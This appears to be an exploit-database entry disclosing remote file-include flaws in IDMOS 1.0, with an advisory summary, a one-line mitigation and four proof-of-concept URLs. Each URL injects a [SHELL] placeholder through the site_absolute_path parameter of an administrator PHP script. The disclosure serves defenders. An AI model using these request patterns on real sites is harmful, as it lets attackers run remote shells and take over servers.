header-logo
Suggest Exploit
vendor:
IDMOS
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File-Include
98
CWE
Product Name: IDMOS
Affected Version From: 1
Affected Version To: 1
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

IDMOS Multiple Remote File-Include Vulnerabilities

IDMOS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible. Examples of vulnerable URLs include: http://www.example.com/path/administrator/admin.php?site_absolute_path=[SHELL], http://www.example.com/path/administrator/menu_operation.php?site_absolute_path=[SHELL], http://www.example.com/path/administrator/template_add.php?site_absolute_path=[SHELL], http://www.example.com/path/administrator/template_operation.php?site_absolute_path=[SHELL].

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29868/info

IDMOS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

IDMOS 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/path/administrator/admin.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/menu_operation.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/template_add.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/template_operation.php?site_absolute_path=[SHELL]